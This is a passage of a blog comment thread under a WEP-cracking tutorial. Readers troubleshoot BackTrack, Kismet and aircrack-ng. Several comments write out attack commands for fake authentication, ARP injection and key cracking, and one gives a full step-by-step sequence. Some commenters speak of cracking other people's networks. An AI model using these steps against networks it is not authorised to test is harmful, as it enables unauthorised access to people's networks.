30.
Oct 28th, 2007
snoop911
My wifi card’s model # isnt listed in the supported/unsupported list… anyone been successful using:
Gigabyte’s GN-WP01GS PCI Wireless Adapter
If not, I’d still love to play with this stuff… can anyone recommend a *cheap* wifi adapter that Backtrack has been tested to work on something like a Intel Core 2 Duo Processor E6600 / Asus P5N-E SLI motherboard ??
Would be nice if there was a usb adapter that was supported, then everyone could just get that one regardless of their computer config (PCI/PCIexpress/cardbus/mac/windows/etc)!
Thanks!
31.
Oct 31st, 2007
acoenoc
great tutorial :) thanks. I made a specific tutorial for use with SLAX and WL-167g adapter, based on this tutorial.
32.
Oct 31st, 2007
Diskbox
Hi Ryan
Awesome write-up. Just what I’ve been looking for for ages.
I get as far as aireplay-ng -1 0 -e belkin -a 00:11:22:33:44:55 -h 00:fe:22:33:f4:e5 ath0 but with my details in and after it’s sent five authentication tries it files with “Attack was unsuccessful. Possile reasons:”……
I’ve checked and everything looks like it correct. I changed belkin to the name shown in kismet, the MAC addresses are right (I think) and ath0 was changed to eth1.
What am I doing wrong?
33.
Nov 1st, 2007
Ryan
eth1 sounds like an ethernet port not a wireless device.
34.
Nov 19th, 2007
Lee
First off, I’m a total linux noob.
It looked like I could follow this guide, but I became stuck very quickly when I couldn’t load kismet or aircrack. I downloaded BackTrack 2 from remote-exploit.org but I don’t think those apps are in the iso.. Can someone please confirm this?
Also, where the bloody hell is the file manager in BT2?
Without an http mirror for the original BackTrack (v1.0) I can’t get hold of it (can’t use ftp). Does anyone have a link?
Thanks.
35.
Nov 20th, 2007
David
Nope, they are in BackTrack 2 - I’ve got it running right next to me now :)
Try running startx after you log in, this will start up the desktop and then you can find what you need in the Applications / BackTrack / Radio Network Analysis / 80211 / xxx. Kismit is in Analyser (or all) and airodump / replay / crack etc are in Cracking / Aircrack (or, all).
Hope that helps!
36.
Dec 1st, 2007
Alex
help guys, when i try to login, every letter is shown twice on screen
so i get
rroooott
what do i do?
37.
Dec 4th, 2007
DieHard1492
Thanks for this great tutorial. I am currently in Backtrack. I found Kismet in the start menu, the app loads (I see a terminal-style window with a blinking cursor and a resolution size 103×34) but then it almost immediately disappears.
It is not minimized. It is just gone.
I tried to load Airodump to see what happens and that app stays open.
Any idea why the Kismet app window disappears / closes / ends?
38.
Dec 7th, 2007
xtrewt
i made a live cd of backtrack2 on a CD-RW using iso recorder and nero burning rom. i booted it and when it gets to the login, i follow the instructions.
Username:root
Password:toor
i get invalid login. i tried reburning it and same thing, no go.
im using windowsxp sp2 sony vaio laptop with a LINKSYS wifi card.
thanks
39.
Dec 10th, 2007
greekgod
Hi Ryan,
I had the exact same problem as xtrewt. First of all I d/l the iso file which appared to be 689 MB or something like that, however after the d/l finished I saw the iso image was just 410 ish MB but it said the d/l was complete. I burnt the image and when booted and when asked for bt login and password I get an invalid login (root and toor login and password respectively)
PLZ HELP ANY ONE!!!
40.
Dec 17th, 2007
mailerr
So download from another mirror.
What about google? Type backtrack 2 download :)
Or maybe backtrack 3? :))
41.
Jan 9th, 2008
galinthias
everything worked great for me, but i was just wondering what exactly i can do with their wep key once i get it, i mean can i decode it to get their actual password or something so i could then just connect to it using my vista computer if possible, or what other things could be done with it, sorry im a total noob
42.
Jan 11th, 2008
Wireless problems
Thanks for tutorial! :)
Could you awnser if “intel(r) wireless WiFi link 4965AGN #3″ is compatible with backtrack?
thanks
if not… what’s the best wireless card for a asus G1?
43.
Jan 11th, 2008
Ryan
hey xtrewt and greekgod… maybe try downloading from a different mirror? I haven’t run into this problem myself. Anyone else having this same problem?
44.
Jan 11th, 2008
Nikko
Hello Ryan, I’m Using backtrack 2 and im stuck on the first step with kismit. I see all the APs around my house but how do i view the MAC address of one of them? Under Network List (Autofit) they are all there but i dont know what to type and where or if i can click on anything… im a linux challenged noob as well.
45.
Jan 11th, 2008
Nikko
nvm i figured out that sQ thing…
46.
Jan 11th, 2008
Nikko
okay im stumped. it seems like my adapter stops working after about 3 or 4 minutes. the packets per second number goes to zero in kismet and the mac addresses in airodump begin to disappear one by one.
Then when i close all the windows and open kismet again, it now lists 5 adapters for me to choose from (wifi0, ath0, ath1, ath2, kis) when before there were just 2 (wifi0, ath1).
No matter which one i choose it eventually says the same “fatal” error and closes the window itself. only way to get it working again is to reboot.
any thoughts??? i am using a listed netgear wpn311 desktop adapter.
47.
Jan 18th, 2008
chomper
Does anyone know why kismet closes as soon as you select a card to use. Windows pops up for a split-second and then disappears.
48.
Jan 20th, 2008
polo
nice tutorial…
i want to ask something:
1, how can we resume capture file(ivs) with airodump-ng?
is there any spesific command i must type in?
in backtrack2, when i run:
airodump-ng –ivs -w test -c 1 ra0
then press Ctrl-C,
then i want to resume, but when i run the same command, i
got test-01 file name saved instead test.
or, can we combine it?
2. how do i set my wireless card with kismet?
on /etc/kismet.conf, i replace the line :
source=rt61,ra0,d-link
then i run kismet,but got error…
it says:
Server options: none
Client options: none
Starting server…
Waiting for server to start before starting UI…
Suid priv-dropping disabled. This may not be secure.
No specific sources given to be enabled, all will be enabled.
Enabling channel hopping.
Enabling channel splitting.
FATAL: Unknown capture source type ‘rt61′ in source ‘rt61,ra0,d-link’
my card is d-link dwl g-510, with rt61 driver…
i know this driver when i run airmon-ng ra0
and it says, it support for monitor mode…
is my card support for this?
or is my kismet’s config wrong?
can anybody tell what i should do?
thx for attention…
49.
Jan 21st, 2008
The Real NeO
Hey there love the tutorial best one i have ever seen
A+
50.
Jan 23rd, 2008
ShahZ
Dear Ryan,
First of all, wonderful tute! Easy to follow too! I have an issue here though. Instead of ath0, I get only eth1. Yes, as mentioned above, it’s an ethernet controller. But I proceeded, and managed to get packets. But I didnt get any ARP even after 400k packets reading. And packets sent were always 0 too. It was all working fine till that step. Managed to use Kismet and get my network listed, airodump was graceful too, and I believe I managed to associate my aireplay with my network. But that was it. No ARPs found. The speed was slow too. Took me about 12 hours to reach 400k packets.
What should I do? Use a PCMCIA WLAN? Get a USB WLAN dongle? or its just something that Im missing here?
Regards,
ShahZ
51.
Jan 23rd, 2008
John Dunks
Hi
Thanks for the tutorial. ive got as far as step 2
but Airodump says No interface specified.
could you tell me where do i specify interface for Airodump?
I have search everywhere on http://aircrack-ng.org for anything about how to config ( specify interface ) and cant find anything its really got me locked down here, i cant move forward. please help, also if you tell me where i specify interface please tell me the format it should look like, eg: for kismet i had to set the capture source and the format was source=ipw3945,wlan0,6
(type, interface, chanel)
please help :)
john
52.
Jan 23rd, 2008
John Dunks
Hey Shahz
I am not an expert but it looks like you have set up kismet source wrong. it goes like this
source=type,interface,name[,channel]
you said yours is:
source=rt61,ra0,d-link
change the last part d-link for the chanel you are using/scanning. kismet should work now.
how did you find out how to config or specify interface on airodump mate?
53.
Jan 23rd, 2008
ShahZ
Heya John,
you actually replied for polo :D
on airodump, just type
airodump-ng -h
and the help section pops out. That’s where I followed before typing the whole string.
Interface can be set in airmon if you wish. What matters is, the wireless device must be in monitor mode.
Hope that helped you..Anyone else can help me? Wonder where is Ryan..
54.
Jan 23rd, 2008
Ryan
Hi Shah - I’ve had some strange results like that as well testing this method. I really don’t have an answer why it happens… you could be too far away from the AP, I’m not really sure.
55.
Jan 23rd, 2008
John Dunks
Hi Ryan, John again..
Ive got to step 3 and 4 now
can you clarify about step 3. after i put the string in, what should happen in the window?
On mine it simply tells me how to get help. “aireplay-ng –help”
IS this right? ive checked my code a few times.. im sure its right. the target SSID has spaces in it, i wonder if thats causing a problem.
my string for step 3 is:
aireplay-ng -1 0 -e LINKSY IS WIFI -a 00:01:4a:05:21:a1 -h 00:1b:77:8c:23:a3 wlan0
The reason that i dont think Step 3 has gone right is because on step 4 it says that it Reads 2015 packets, but doesnt pick up any ARP requests and 0 ACKs
?
please help if you can?
56.
Jan 24th, 2008
ShahZ
In order to obtain ARP, is it important for the wireless network to be running activities (other clients connected to it)? My ethernet controller isnt really listed in the compatibility list, but surprisingly, the mac address was obtained succesfully, and the wireless worked seemlessly. Just no ARPs recieved. On the other test laptop which was using Atheros wireless ethernet controller, BackTrack didnt identify it and it didnt loaded at all. I’m stuck here really. Wonder where’s the flaw.
57.
Jan 25th, 2008
Ryan
I believe if there aren’t any other clients accessing, you won’t receive any ARPs to capture and inject. You can fake auth, but if there is mac filtering enabled on the router and no other client accesses it for example, an ARP wouldn’t be generated to capture and inject. Don’t quote me on that, been a long time since I messed with this.
58.
Jan 26th, 2008
ShahZ
haha..I dont really see a point for enabling Mac filtering WITH WEP protection..That’s really pointless..hehe..Only one last question Ryan, did you use a USB wireless adapter or a PCI/built in adapter?
59.
Jan 27th, 2008
shawha
Linux WEP hacking Noob.
I was able to successfully crack my home 128 bit 64 hex wep encrypted wireless network. Here is what I did:
First of all I used BAcktrack 3.
I mainly followed the instructions above which were very helpful and explained alot.
opened start/internet/wireless asistant
located the ap I wanted and its channel #
first ran kismet
open terminal
run start-kismet-ng
choose wifi0
verify iwconfig -should have ath0 “managed” and ath1 “monitor”
iwconfig ath1 rate auto
airodump-ng –ivs -w /mnt/sda1/aircrack/temp01 –channel 10 ath1
macchanger -s ath1
copy my wireless mac address
aireplay-ng -1 0 -e linksys -a 00:11:22:33:44:55 -h 00:11:22:33:44:55 ath1
aireplay-ng -3 -b 00:11:22:33:44:55 -h 00:11:22:33:44:55 ath1
aircrack-ng -s /mnt/sda1/aircrack/test1-01.ivs
waited 3 minutes found wep key
I manually typed it at first and it did not work.
Copied it to kedit removed the colons and copy and pasted and it worked!
60.
Jan 28th, 2008
Ryan
My Toshiba laptop has a built in Atheros chipset wireless adapter. Worked out of the box.
61.
Feb 5th, 2008
Ivan
NIKKO! I am having the same issue like yours did you get any help on this ??
okay im stumped. it seems like my adapter stops working after about 3 or 4 minutes. the packets per second number goes to zero in kismet and the mac addresses in airodump begin to disappear one by one.
Then when i close all the windows and open kismet again, it now lists 5 adapters for me to choose from (wifi0, ath0, ath1, ath2, kis) when before there were just 2 (wifi0, ath1).
No matter which one i choose it eventually says the same “fatal” error and closes the window itself. only way to get it working again is to reboot.
any thoughts??? i am using a listed netgear wpn311 desktop adapter.
62.
Feb 5th, 2008
Ivan
Sorry I am using a Neatgear WG511T it has an Atheros chipset
not wpn311
63.
Feb 16th, 2008
Nikko
I have no idea ivan, I’m still trying to figure it out. Any thoughts ryan, I am now trying to crack with a listed dlink wda-2320 and it stops working after about 10 minutes or so. Could it be my motherboard or something?
I’m going to install the card on my old dell and try it from there, the other thing i have not tried is backtrack ver 1. I’ve been using ver 2 and 3. Anybody, same issues as us???
64.
Feb 19th, 2008
Daniel
Hi all,
when i use ‘aireplay-ng -1 0 …’ no matter what -h mac address i use i always get:
The interface MAC (00:00:00:00:00:00) doesn’t match the specified MAC (-h).
ifconfig eth1 hw ether 00:18:DE:D4:BF:10
23:55:17 Waiting for beacon frame (BSSID: 00:13:10:4A:6F:ED) on channel 6
23:55:17 Sending Authentication Request (Open System)
23:55:19 Sending Authentication Request (Open System)
……………………………………
Attack was unsuccessful. Possible reasons:
* Perhaps MAC address filtering is enabled.
* Check that the BSSID (-a option) is correct.
* Try to change the number of packets (-o option).
* The driver/card doesn’t support injection.
* This attack sometimes fails against some APs.
* The card is not on the same channel as the AP.
* You’re too far from the AP. Get closer, or lower
the transmit rate.
where the mac at line:
ifconfig eth1 hw ether 00:18:DE:D4:BF:10
is the mac i typed as -h. Whatever i use as mac i get same error, no matter is a real client or a mac i invented…
Any ideas?
Pls help me, i am stuck on it.
Thanks,
Dani.
65.
Mar 6th, 2008
Steve
Awesome post for newbies. Thanks so much. One question: is it even possible to perform these tasks without writing to a disk? I don’t feel like partitioning my drive right now. Again, thanks!
66.
Mar 9th, 2008
Zanxyou
I try it several times and it doesen’t work! if i create files, they desapear and i can not find them. maybe u must explain what kind of cfg u put in before u start with the whole thing…. or maybe im to stupid or just a noob… :)
…nice tutorial…
67.
Apr 2nd, 2008
raultsu
i got all the steps to work but it takes a long time for me to collect ivs. it took about an hour to collect 2000. what am i doing wrong?
68.
Apr 8th, 2008
kivi
hey i have a major problem, i cant even get past step 1…..i cant open kismet. I am using bt3 boot from the disk. I have an intel(R) wireless wifi link 4965. when i try to open kismet it just doesnt go. Can someone please help????
If someone is kind enough to guide me through the process please reply to this post or email me at kivi12k@aol.com
69.
Apr 20th, 2008
Jeff
Letting you know that I just stumbled this article
70.
Apr 28th, 2008
fraggyy
hi there.I have the exact same problem with daniel.to tell u the truth i have not yet figured out clearly whether the second mac adress should be the one of MY wireless card ,or the CLIENT’S mac adress,who is connecting to the rooter(AP)anybody can help?
71.
May 10th, 2008
startx problem
Hi there I’m having the same problem as Andrew
“type : startx
and it says:
-bash: bt: command not found
Can you help me ?
Thx a lot!”
but instead it says something about server x or something..
Ryan help me please :) :)
72.
May 10th, 2008
Da Boss
Great tutorial man…
I’m real nu to all tis tho but yo tutorial made alot clear…
I jus have tis question tho… which part of the screen can I get the Channel # an I use a Dell Inspiron 6400 with the Brodcom wireless card 4311 which is in the list but I cant manage to find the name of my wireless Adapter nor the Mac address even after runnin iwconfig…
I jus get somtin lyk this “eth1″. Is this the name of my card????// Help pls…
73.
May 10th, 2008
startx problem
My startx 100% doesn’t work but flux does :S any clearer?
~(btw I am using live cd burnt to a cd, booted beforew I get in windows)
I tried just using the terminal I get after loging in succefully as root and toor, but it doesn’t recognise the promt
“kismet”
Thanks in advance
74.
May 25th, 2008
ordico
Hey Kivi, u havta config kismet
go google kismet.conf
75.
Jun 1st, 2008
Ratman
Hi
Ive created a video for you guys to understand easily
http://uk.youtube.com/watch?v=gGMuI2tyuMc
76.
Jun 2nd, 2008
Mark
How do I convert the resulting HEX WEP key into decypherable alphanumeric password (if it is?)
77.
Jun 5th, 2008
ratman
I have made a video. Easy to understand
http://www.youtube.com/watch?v=gGMuI2tyuMc
Follow the instructions in the more info section
78.
Jun 11th, 2008
Mulumba K.
does any one know how to use backtrack 3 or is it the same as this
79.
Jun 18th, 2008
Ezzy
Hi Ryan,
This is a gr8 tut & very easy to understand for begginers.first i had some prob following all the procedure but any how i managed to hack.Thanks for your effort.
80.
Jun 23rd, 2008
Stefan Certic
Great tutorial! Working!
81.
Jul 9th, 2008
Justin
Does any one know if a Dynex DX-BGDTC desktop card will work with backtrack? Or would an HP6710b Laptop built in WIFI work?
82.
Jul 15th, 2008
Ben
Please help with this problem.
Im running backtrack 3 off the cd and that is fine, and i am trying to crack my wep encrypted network. everything works fine except for the packet injection step. i beleive this is because my wireless card is not in monitor mode properly;
bt ~ # airmon-ng start wlan0
Interface Chipset Driver
wlan0 Intel 4965 a/b/g/n iwl4965 - [phy0]
ERROR: Neither the sysfs interface links nor the iw command is available.
Please download and install iw from hxxp://dl.aircrack-ng.org/iw.tar.bz2
I have downloaded iw but i have no idea how to install it. Im very new to linux. Could someone please help me out? :(
Thanks
83.
Jul 15th, 2008
Ben
Just to correct my other post, my wireless lan adapter is actually an Intel 3945;
Interface Chipset Driver
wlan0 Intel 3945 a/b/g iwl3945 - [phy0]
ERROR: Neither the sysfs interface links nor the iw command is available.
Please download and install iw from http://dl.aircrack-ng.org/iw.tar.bz2
84.
Jul 21st, 2008
sirjune
ifconfig -a shows loopback and eth0 only. i dont have wlan0 or wifi0 or ath0. i suppose eth0 is my LAN port. i have a built-in wifi port on my HP pavillion laptop. how to i get to have the other interfaces?
85.
Jul 25th, 2008
Fred
I am very new to backtrack and linux. I installed backtrack 3 on Toshiba Satellite. Its not asking me for any username or password. The tutorial says to login as root. Please let me know if there is some probs with my installation. please advice
86.
Aug 6th, 2008
alden
does anyone knows how to deal with long essid’s?
For example: James P or Animal House?
And another thing. One of the APs has two bssid’s. Which one to choose and why there are two?
87.
Aug 6th, 2008
jorge
hey sorry to trouble you guys. It seems i get stuck on step 2 I cant open airodump in backtrack3. when i look manually for the files i find airosnarf and airsnort. help me anyone?
88.
Sep 1st, 2008
Sniparx
P.s T0: FRED, It’s all g00d its n0t supp0se t0 ask f0r username 0r passw0rd, 0n s0me things it d0es, but it didn’t either with mine, s0 n0 w0rries it’s all g00d. C0ntinue using the tut0rial and ull get there, but again a easier clearer way t0 see h0w t0d0 it if ur new like me is checking 0ut http://blip.tv/file/930698... h0pe u find it usefull, Btw if everything w0rks like in tut0rial, and it sitll d0es n0t receive Data then y0u p0ssibly need a c0mpatible Wifi, Id suggest the Netgear WG111v2 It w0rks perfect, ive had a Belking 54gb USB it w0rks, but!!! there’ is a slight pr0blem bringing the card back intu m0nit0r m0de after changing mac address. i just skipped that part and used 0riginal mac 0n my WIFI and cracked the WEP key ;D… Evil i have ermm lets see ab0ut 5 netw0rks cracked :D rawr!… fun stuff.
89.
Sep 5th, 2008
josh
do rly need to do an injection to crack the key? because im have alittle trouble trying to hack my network
Subscribe to:
Posts (Atom)